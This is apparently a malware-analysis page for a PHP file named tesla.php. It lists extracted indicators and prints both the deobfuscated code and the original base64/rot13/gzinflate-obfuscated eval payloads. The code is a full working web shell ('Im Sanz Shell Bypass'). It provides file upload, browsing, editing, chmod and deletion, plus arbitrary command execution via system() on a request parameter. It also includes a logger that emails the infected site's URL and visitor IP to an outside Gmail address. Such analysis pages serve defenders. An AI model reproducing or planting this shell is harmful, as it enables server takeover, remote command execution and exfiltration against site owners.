PHP Malware Analysis

Back to list

Filename: tesla.php

Tags

URLs
Emails
  • fatonahnasiah@gmail.com
Execution
  • system
Input
  • _GET
  • _POST
  • _FILES
Environment
  • set_time_limit
  • error_reporting
  • php_uname
  • getcwd
Files
  • file_get_contents
  • copy

Deobfuscated code

 <?php 
eval /* PHPDeobfuscator eval output */ {
    error_reporting(0);
    session_start();
    if (get_magic_quotes_gpc()) {
        foreach ($_POST as $key => $value) {
            $_POST[$key] = stripslashes($value);
        }
    }
    echo "<!DOCTYPE HTML>\r\n<link href=\"https://fonts.googleapis.com/css?family=Kelly+Slab\" rel=\"stylesheet\" type=\"text/css\">\r\n<link href=\"https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css\" rel=\"stylesheet\" type=\"text/css\"/>\r\n<center>\r\n<style type=\"text/css\">\r\nbody {\r\n\tfont-family: Kelly Slab;\r\n\tbackground-color: black;\r\n\tcolor: lime;\r\n\t}\r\n#content tr:hover{\r\n\tbackground-color: grey;\r\n\ttext-shadow:0px 0px 10px #000000;\r\n\t}\r\n#content .first{\r\n\tcolor: #000000;\r\n\tbackground-image:url(#);\r\n\t}\r\n#content .first:hover{\r\n\tbackground-color: grey;\r\n\ttext-shadow:0px 0px 1px #339900;\r\n\t}\r\ntable, th, td {\r\n\t\tborder-collapse:collapse;\r\n\t\tpadding: 5px;\r\n\t\tcolor: lime;\r\n\t\t}\r\n.table_home, .th_home, .td_home { \r\n\t\tcolor: lime;\r\n\t\tborder: 2px solid grey;\r\n\t\tpadding: 7px;\r\n\t\t}\r\na{\r\n\tfont-size: 19px;\r\n\tcolor: #00ff00;\r\n\ttext-decoration: none;\r\n\t}\r\na:hover{\r\n\tcolor: white;\r\n\ttext-shadow:0px 0px 10px #339900;\r\n\t}\r\ninput,select,textarea{\r\n\tborder: 1px #ffffff solid;\r\n\t-moz-border-radius: 5px;\r\n\t-webkit-border-radius:5px;\r\n\tborder-radius:5px;\r\n\t}\r\n.close {\r\n\toverflow: auto;\r\n\tborder: 1px solid lime;\r\n\tbackground: lime;\r\n\tcolor: white;\r\n\t}\r\n.r {\r\n\tfloat: right;\r\n\ttext-align: right;\r\n\t}\r\n</style>\r\n<a href=\"?\"><h1 style=\"font-family: Kelly Slab; font-size: 35px; color: white;\">\r\nIm Sanz Shell Bypass </h1></a>\r\n<BODY>\r\n\r\n<table width=\"95%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" align=\"left\">\r\n<tr><td>";
    echo "<tr><td><font color='white'>\r\n<i class='fa fa-user'></i> <td>: <font color='lime'>" . $_SERVER['REMOTE_ADDR'] . "<tr><td><font color='white'>\r\n<i class='fa fa-desktop'></i> <td>: <font color='lime'>" . gethostbyname($_SERVER['HTTP_HOST']) . " / " . $_SERVER['SERVER_NAME'] . "<tr><td><font color='white'>\r\n<i class='fa fa-hdd-o'></i> <td>: <font color='lime'>" . php_uname() . "</font></tr></td></table>";
    echo "<table width=\"95%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" align=\"center\">\r\n<tr align=\"center\"><td align=\"center\"><br>";
    if (isset($_GET['path'])) {
        $path = $_GET['path'];
    } else {
        $path = getcwd();
    }
    $path = str_replace('\\', '/', $path);
    $paths = explode('/', $path);
    foreach ($paths as $id => $pat) {
        if ($pat == '' && $id == 0) {
            $a = true;
            echo "<i class=\"fa fa-folder-o\"></i> : <a href=\"?path=/\">/</a>";
            continue;
        }
        if ($pat == '') {
            continue;
        }
        echo "<a href=\"?path=";
        for ($i = 0; $i <= $id; $i++) {
            echo "{$paths[$i]}";
            if ($i != $id) {
                echo "/";
            }
        }
        echo '">' . $pat . '</a>/';
    }
    echo "<br><br><br><font color=\"lime\"><form enctype=\"multipart/form-data\" method=\"POST\">\r\nUpload File: <input type=\"file\" name=\"file\" style=\"color:lime;border:2px solid lime;\" required/></font>\r\n<input type=\"submit\" value=\"UPLOAD\" style=\"margin-top:4px;width:100px;height:27px;font-family:Kelly Slab;font-size:15;background:black;color: lime;border:2px solid lime;border-radius:5px\"/>";
    if (isset($_FILES['file'])) {
        if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
            echo "<br><br><font color=\"lime\">UPLOAD SUCCES !!!!</font><br/>";
        } else {
            echo "<script>alert(\"File Gagal Diupload !!\")</script>";
        }
    }
    echo "</form></td></tr>";
    if (isset($_GET['filesrc'])) {
        echo "<tr><td>files >> ";
        echo $_GET['filesrc'];
        echo "</tr></td></table><br />";
        echo ' <textarea  style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1200px;" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea>';
    } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
        echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
        //Chmod
        if ($_POST['opt'] == 'chmod') {
            if (isset($_POST['perm'])) {
                if (chmod($_POST['path'], $_POST['perm'])) {
                    echo "<br><br><font color=\"lime\">CHANGE PERMISSION SUCCESS !!</font><br/>";
                } else {
                    echo "<script>alert(\"Change Permission Gagal !!\")</script>";
                }
            }
            echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" style="width:80px; height: 30px;"/>
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Lanjut" style="width:60px; height: 30px;"/>
</form>';
        } elseif ($_GET['opt'] == 'btw') {
            $cwd = getcwd();
            echo '<form action="?option&path=' . $cwd . '&opt=delete&type=buat" method="POST">
New Name : <input name="name" type="text" size="25" value="Folder" style="width:300px; height: 30px;"/>
<input type="hidden" name="path" value="' . $cwd . '">
<input type="hidden" name="opt" value="delete">
<input type="submit" value="Go" style="width:100px; height: 30px;"/>
</form>';
        } elseif ($_POST['opt'] == 'rename') {
            if (isset($_POST['newname'])) {
                if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                    echo "<br><br><font color=\"lime\">CHANGE NAME SUCCESS !!</font><br/>";
                } else {
                    echo "<script>alert(\"Change Name Gagal !!\")</script>";
                }
                $_POST['name'] = $_POST['newname'];
            }
            echo '<form method="POST">
New Name : <input name="newname" type="text" size="5" style="width:20%; height:30px;" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Lanjut" style="height:30px;" />
</form>';
        } elseif ($_POST['opt'] == 'edit') {
            if (isset($_POST['src'])) {
                $fp = fopen($_POST['path'], 'w');
                if (fwrite($fp, $_POST['src'])) {
                    echo "<br><br><font color=\"lime\">EDIT FILE SUCCESS !!</font><br/>";
                } else {
                    echo "<script>alert(\"Edit File Gagal !!\")</script>";
                }
                fclose($fp);
            }
            echo '<form method="POST">
<textarea cols=80 rows=20 name="src" style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1000px;">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Lanjut" style="height:30px; width:70px;"/>
</form>';
        }
        echo "</center>";
    } else {
        echo "</table><br /><center>";
        //delete dir
        if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
            if ($_POST['type'] == 'dir') {
                if (rmdir($_POST['path'])) {
                    echo "<br><br><font color=\"lime\">DELETE DIR SUCCESS !!</font><br/>";
                } else {
                    echo "<script>alert(\"Delete Dir Gagal !!\")</script>>";
                }
            } elseif ($_POST['type'] == 'file') {
                if (unlink($_POST['path'])) {
                    echo "<br><br><font color=\"lime\">DELETE FILE SUCCESS !!</font><br/>";
                } else {
                    echo "<script>alert(\"Delete File Gagal !!\")</script>";
                }
            }
        }
        echo "</center>";
        $scandir = scandir($path);
        $pa = getcwd();
        echo "<div id=\"content\"><table width=\"95%\" class=\"table_home\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<th><center>Name</center></th>\r\n<th><center>Size</center></th>\r\n<th><center>Perm</center></th>\r\n<th><center>Options</center></th>\r\n</tr>\r\n<tr>";
        foreach ($scandir as $dir) {
            if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
                continue;
            }
            echo "<tr>\r\n<td class=td_home><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='><a href=\"?path={$path}/{$dir}\"> {$dir}</a></td>\r\n<td class=td_home><center>DIR</center></td>\r\n<td class=td_home><center>";
            if (is_writable("{$path}/{$dir}")) {
                echo "<font color=\"#57FF00\">";
            } elseif (!is_readable("{$path}/{$dir}")) {
                echo "<font color=\"#FF0004\">";
            }
            echo perms("{$path}/{$dir}");
            if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
                echo "</font>";
            }
            echo "</center></td>\r\n<td class=td_home><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\" style=\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\">\r\n<option value=\"Action\">Action</option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n<input type=\"submit\" value=\">\" style=\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\"/>\r\n</form></center></td>\r\n</tr>";
        }
        echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
        foreach ($scandir as $file) {
            if (!is_file("{$path}/{$file}")) {
                continue;
            }
            $size = filesize("{$path}/{$file}") / 1024;
            $size = round($size, 3);
            if ($size >= 1024) {
                $size = round($size / 1024, 2) . ' MB';
            } else {
                $size .= ' KB';
            }
            echo "<tr>\r\n<td class=td_home><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href=\"?filesrc={$path}/{$file}&path={$path}\"> {$file}</a></td>\r\n<td class=td_home><center>" . $size . "</center></td>\r\n<td class=td_home><center>";
            if (is_writable("{$path}/{$file}")) {
                echo "<font color=\"#57FF00\">";
            } elseif (!is_readable("{$path}/{$file}")) {
                echo "<font color=\"#FF0004\">";
            }
            echo perms("{$path}/{$file}");
            if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
                echo "</font>";
            }
            echo "</center></td>\r\n<td class=td_home><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\" style=\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\">\r\n<option value=\"Action\">Action</option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"edit\">Edit</option>\r\n<option value=\"rename\">Rename</option>\r\n<option value=\"chmod\">Chmod</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n<input type=\"submit\" value=\">\" style=\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\"/>\r\n</form></center></td>\r\n</tr>";
        }
        echo "</table>\r\n</div>";
    }
    function perms($file)
    {
        $perms = fileperms($file);
        if (($perms & 0xc000) == 0xc000) {
            // Socket
            $info = 's';
        } elseif (($perms & 0xa000) == 0xa000) {
            // Symbolic Link
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {
            // Regular
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {
            // Block special
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {
            // Directory
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {
            // Character special
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {
            // FIFO pipe
            $info = 'p';
        } else {
            // Unknown
            $info = 'u';
        }
        $info .= $perms & 0x100 ? 'r' : '-';
        $info .= $perms & 0x80 ? 'w' : '-';
        $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
        $info .= $perms & 0x20 ? 'r' : '-';
        $info .= $perms & 0x10 ? 'w' : '-';
        $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
        $info .= $perms & 0x4 ? 'r' : '-';
        $info .= $perms & 0x2 ? 'w' : '-';
        $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
        return $info;
    }
};
eval /* PHPDeobfuscator eval output */ {
    @ini_set('output_buffering', 0);
    @ini_set('display_errors', 0);
    set_time_limit(0);
    ini_set('memory_limit', '64M');
    header('Content-Type: text/html; charset=UTF-8');
    $tujuanmail = 'fatonahnasiah@gmail.com';
    $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
    $pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
    mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
};
eval /* PHPDeobfuscator eval output */ {
    if (isset($_REQUEST["cmd"])) {
        echo "<pre>";
        $cmd = $_REQUEST["cmd"];
        system($cmd);
        echo "</pre>";
        die;
    }
};


Original code

 <?php 
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))))
?>
<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('jY9deMIwFIb/yiEIqcOPXYwxTQTnSethcXMirCIhDckpKJlaWlP765fOIWZKuwq8z3ueZjL1wmZ6MaJSibJR/kTWtUhenOgAYfsJWS+FynjZmAO3VxVX/+BAOPrW8sa3HqMuugy0ti3U4VlPnd7f5TRjdFpySFFfC4FJ4DA7VRsD2j2OHbZaAlR0RxBZFtnb8KGb6G75TBrRGt/ABHV6sBDGCaO9ZNNGF4+OUlhQZM+lThdXxCHKazwmMIIen7P0haVbbX754zJ0Z2pSRfa8YPOML9IN3QWRtNoIYRqrsLPVfn+RxxJhNkKwrCpytYYYtkD+uPJMxvhltVe/txDYkQS6M6NfPxkAbJ+t1ywlg6toIf+PsJ98AQ==')))))?>
<?php
eval(str_rot13(gzinflate(str_rot13(base64_decode('KyvWKFhYK1fXQ4lqDWXxCGVmj0kqqCpHitXUrEkoKihaRUOyVkEtskaySUMBiivYKmCqtElVy1ZYL6rSAKkA8qDa9KH6CsuKrBV3AQ==')))))?>